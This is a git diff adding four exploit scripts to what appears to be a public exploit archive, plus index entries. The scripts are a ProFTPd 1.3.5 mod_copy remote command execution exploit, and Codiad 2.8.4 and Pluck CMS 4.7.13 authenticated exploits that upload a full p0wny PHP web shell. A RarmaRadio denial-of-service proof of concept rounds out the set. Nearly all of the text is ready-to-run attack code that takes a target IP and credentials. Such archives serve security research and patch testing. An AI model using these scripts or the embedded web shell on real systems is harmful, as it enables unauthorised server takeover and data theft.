diff --git a/exploits/linux/remote/49908.py b/exploits/linux/remote/49908.py new file mode 100755 index 000000000..729a313f6 --- /dev/null +++ b/exploits/linux/remote/49908.py @@ -0,0 +1,46 @@ +# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) +# Date: 25/05/2021 +# Exploit Author: Shellbr3ak +# Version: 1.3.5 +# Tested on: Ubuntu 16.04.6 LTS +# CVE : CVE-2015-3306 + +#!/usr/bin/env python3 + +import sys +import socket +import requests + +def exploit(client, target): + client.connect((target,21)) # Connecting to the target server + banner = client.recv(74) + print(banner.decode()) + client.send(b'site cpfr /etc/passwd\r\n') + print(client.recv(1024).decode()) + client.send(b'site cpto \r\n') # phpinfo() is just a PoC. + print(client.recv(1024).decode()) + client.send(b'site cpfr /proc/self/fd/3\r\n') + print(client.recv(1024).decode()) + client.send(b'site cpto /var/www/html/test.php\r\n') + print(client.recv(1024).decode()) + client.close() + print('Exploit Completed') + +def check(url): + req = requests.get(url) # Requesting the written PoC php file via HTTP + if req.status_code == 200: + print('[+] File Written Successfully') + print(f'[+] Go to : {url}') + else: + print('[!] Something Went Wrong') + print('[!] Directory might not be writable') + +def main(): + client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + target = sys.argv[1] + exploit(client, target) + url = 'http://' + target + '/test.php' + check(url) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/49907.py b/exploits/multiple/webapps/49907.py new file mode 100755 index 000000000..5bd07153a --- /dev/null +++ b/exploits/multiple/webapps/49907.py @@ -0,0 +1,135 @@ +# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (3) +# Date: 24.05.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: http://codiad.com/ +# Software Link: https://github.com/Codiad/Codiad/releases/tag/v.2.8.4 +# Version: 2.8.4 +# Tested on Xubuntu 20.04 +# CVE: CVE-2018-19423 + +''' +Description: +Codiad 2.8.4 allows remote authenticated administrators to execute arbitrary code by uploading an executable file. +''' + + +''' +Import required modules: +''' +import requests +import json +import time +import sys +import urllib.parse + +''' +User Input: +''' +target_ip = sys.argv[1] +target_port = sys.argv[2] +username = sys.argv[3] +password = sys.argv[4] +codiadpath = input('Please input the path of Codiad( for example: / ): ') +projectname = input('Please input the name of the actual project: ') + + + +''' +Get cookie +''' +session = requests.Session() +link = 'http://' + target_ip + ':' + target_port + codiadpath +response = session.get(link) +cookies_session = session.cookies.get_dict() +cookie = json.dumps(cookies_session) +cookie = cookie.replace('"}','') +cookie = cookie.replace('{"', '') +cookie = cookie.replace('"', '') +cookie = cookie.replace(" ", '') +cookie = cookie.replace(":", '=') + + +''' +Authentication: +''' +# Compute Content-Length: +base_content_len = 45 +username_encoded = urllib.parse.quote(username, safe='') +username_encoded_len = len(username_encoded.encode('utf-8')) +password_encoded = urllib.parse.quote(password, safe='') +password_encoded_len = len(password_encoded.encode('utf-8')) +content_len = base_content_len + username_encoded_len + password_encoded_len + +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', + 'Accept': '*/*', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', + 'X-Requested-With': 'XMLHttpRequest', + 'Content-Length': str(content_len), + 'Origin': 'http://' + target_ip + ':' + target_port, + 'Connection': 'close', + 'Referer': 'http://' + target_ip + ':' + target_port + '/', + 'Cookie': cookie +} + +# Body: +body = { + 'username': username, + 'password': password, + 'theme': 'default', + 'language': 'en' +} + +# Post authentication request: +link_base = 'http://' + target_ip + ':' + target_port + codiadpath +link_auth = link_base + 'components/user/controller.php?action=authenticate' +print('') +print('Posting authentication request: ') +auth = requests.post(link_auth, headers=header, data=body) +print('Response: ') +print(auth.text) +time.sleep(2) + + +''' +Upload Webshell: +''' +# Construct Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + "Content-Type": "multipart/form-data; boundary=---------------------------289777152427948045812862014674", + 'Connection': 'close', + 'Cookie': cookie, + 'Upgrade-Insecure-Requests': '1' +} + +# Construct Shell Payload: https://github.com/flozz/p0wny-shell +data = "\r\n\r\n\r\n-----------------------------289777152427948045812862014674\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n \n \n p0wny@shell:~#\n \n \n\n \n \n\n \n
\n
\n                
\n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n
\n
\n
\n \n
\n \n
\n
\n
\n \n\n\n\r\n-----------------------------289777152427948045812862014674--\r\n" + +#Construct link and posting request which will upload the file: +link_exploit = link_base + 'components/filemanager/controller.php?action=upload&path=/var/www/html/data/' + projectname +print('') +print('Posting request wich will upload the file: ') +exploit = requests.post(link_exploit, headers=header, data=data) +print('Response:') +print(exploit.text) +time.sleep(2) + + +''' +Finish: +''' +print('') +print('File uploaded except you got an error message before. If so please run this program again and correct your', + 'mistakes!') +print('') +print('Path of file on the server: http://' + target_ip + ':' + target_port + codiadpath + '/data/' + projectname + '/' + 'shell.php') +print('') \ No newline at end of file diff --git a/exploits/php/webapps/49909.py b/exploits/php/webapps/49909.py new file mode 100755 index 000000000..6f852e96b --- /dev/null +++ b/exploits/php/webapps/49909.py @@ -0,0 +1,125 @@ +# Exploit Title: Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated) +# Date: 25.05.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://github.com/pluck-cms/pluck +# Software Link: https://github.com/pluck-cms/pluck/releases/tag/4.7.13 +# Version: 4.7.13 +# Tested on Xubuntu 20.04 +# CVE: CVE-2020-29607 + +''' +Description: +A file upload restriction bypass vulnerability in Pluck CMS before 4.7.13 allows an admin +privileged user to gain access in the host through the "manage files" functionality, +which may result in remote code execution. +''' + + +''' +Import required modules: +''' +import sys +import requests +import json +import time +import urllib.parse + + +''' +User Input: +''' +target_ip = sys.argv[1] +target_port = sys.argv[2] +password = sys.argv[3] +pluckcmspath = sys.argv[4] + + +''' +Get cookie +''' +session = requests.Session() +link = 'http://' + target_ip + ':' + target_port + pluckcmspath +response = session.get(link) +cookies_session = session.cookies.get_dict() +cookie = json.dumps(cookies_session) +cookie = cookie.replace('"}','') +cookie = cookie.replace('{"', '') +cookie = cookie.replace('"', '') +cookie = cookie.replace(" ", '') +cookie = cookie.replace(":", '=') + + +''' +Authentication: +''' +# Compute Content-Length: +base_content_len = 27 +password_encoded = urllib.parse.quote(password, safe='') +password_encoded_len = len(password_encoded.encode('utf-8')) +content_len = base_content_len + password_encoded_len + +# Construct Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Content-Length': str(content_len), + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Referer': 'http://' + target_ip + pluckcmspath + '/login.php', + 'Cookie': cookie, + 'Upgrade-Insecure-Requests': '1' +} + +# Construct Data: +body = { + 'cont1': password, + 'bogus': '', + 'submit': 'Log in', +} + +# Authenticating: +link_auth = 'http://' + target_ip + ':' + target_port + pluckcmspath + '/login.php' +auth = requests.post(link_auth, headers=header, data=body) +print('') +if 'error' in auth.text: + print('Password incorrect, please try again:') + exit() +else: + print('Authentification was succesfull, uploading webshell') + print('') + + +''' +Upload Webshell: +''' +# Construct Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'multipart/form-data; boundary=---------------------------5170699732428994785525662060', + 'Connection': 'close', + 'Referer': 'http://' + target_ip + ':' + target_port + pluckcmspath + '/admin.php?action=files', + 'Cookie': cookie, + 'Upgrade-Insecure-Requests': '1' +} + +# Constructing Webshell payload: I'm using p0wny-shell: https://github.com/flozz/p0wny-shell +data = "-----------------------------5170699732428994785525662060\r\nContent-Disposition: form-data; name=\"filefile\"; filename=\"shell.phar\"\r\nContent-Type: application/octet-stream\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n \n \n p0wny@shell:~#\n \n \n\n \n \n\n \n
\n
\n                
\n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n
\n
\n
\n \n
\n \n
\n
\n
\n \n\n\n\r\n-----------------------------5170699732428994785525662060\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload\r\n-----------------------------5170699732428994785525662060--\r\n" + +# Uploading Webshell: +link_upload = 'http://' + target_ip + ':' + target_port + pluckcmspath + '/admin.php?action=files' +upload = requests.post(link_upload, headers=header, data=data) + + +''' +Finish: +''' +print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + pluckcmspath + '/files/shell.phar') +print('') \ No newline at end of file diff --git a/exploits/windows/dos/49906.py b/exploits/windows/dos/49906.py new file mode 100755 index 000000000..c56a4d0c9 --- /dev/null +++ b/exploits/windows/dos/49906.py @@ -0,0 +1,29 @@ +# Exploit Title: RarmaRadio 2.72.8 - Denial of Service (PoC) +# Date: 2021-05-25 +# Exploit Author: Ismael Nava +# Vendor Homepage: http://www.raimersoft.com/ +# Software Link: http://raimersoft.com/downloads/rarmaradio_setup.exe +# Version: 2.75.8 +# Tested on: Windows 10 Home x64 + +#STEPS +# Open the program RarmaRadio +# Click in Edit and select Settings +# Click in Network option +# Run the python exploit script, it will create a new .txt files +# Copy the content of the file "Lambda.txt" +# Paste the content in the fields Username, Server, Port and User Agent +# Click in OK +# End :) + + +buffer = 'Ñ' * 100000 + +try: + file = open("Lambda.txt","w") + file.write(buffer) + file.close() + + print("Archive ready") +except: + print("Archive no ready") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 56b9d2b7e..d2efa3b60 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6783,6 +6783,7 @@ id,file,description,date,author,type,platform,port 49844,exploits/windows/dos/49844.py,"Sandboxie 5.49.7 - Denial of Service (PoC)",2021-05-07,"Erick Galindo",dos,windows, 49883,exploits/ios/dos/49883.py,"WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)",2021-05-19,"Luis Martínez",dos,ios, 49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",2021-05-24,"Ismael Nava",dos,windows, +49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",2021-05-26,"Ismael Nava",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -18470,6 +18471,7 @@ id,file,description,date,author,type,platform,port 49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",2021-04-21,BenChaliah,remote,hardware, 49815,exploits/linux/remote/49815.py,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)",2021-04-30,liewehacksie,remote,linux, 49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",2021-05-21,legend,remote,solaris, +49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",2021-05-26,Shellbr3ak,remote,linux, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -44069,3 +44071,5 @@ id,file,description,date,author,type,platform,port 49903,exploits/php/webapps/49903.txt,"WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)",2021-05-24,"Bastijn Ouwendijk",webapps,php, 49904,exploits/php/webapps/49904.txt,"Gadget Works Online Ordering System 1.0 - 'Category' Persistent Cross-Site Scripting (XSS)",2021-05-25,"Vinay H C",webapps,php, 49905,exploits/php/webapps/49905.txt,"WordPress Plugin Cookie Law Bar 1.2.1 - 'clb_bar_msg' Stored Cross-Site Scripting (XSS)",2021-05-25,"Mesut Cetin",webapps,php, +49907,exploits/multiple/webapps/49907.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)",2021-05-26,"Ron Jost",webapps,multiple, +49909,exploits/php/webapps/49909.py,"Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)",2021-05-26,"Ron Jost",webapps,php,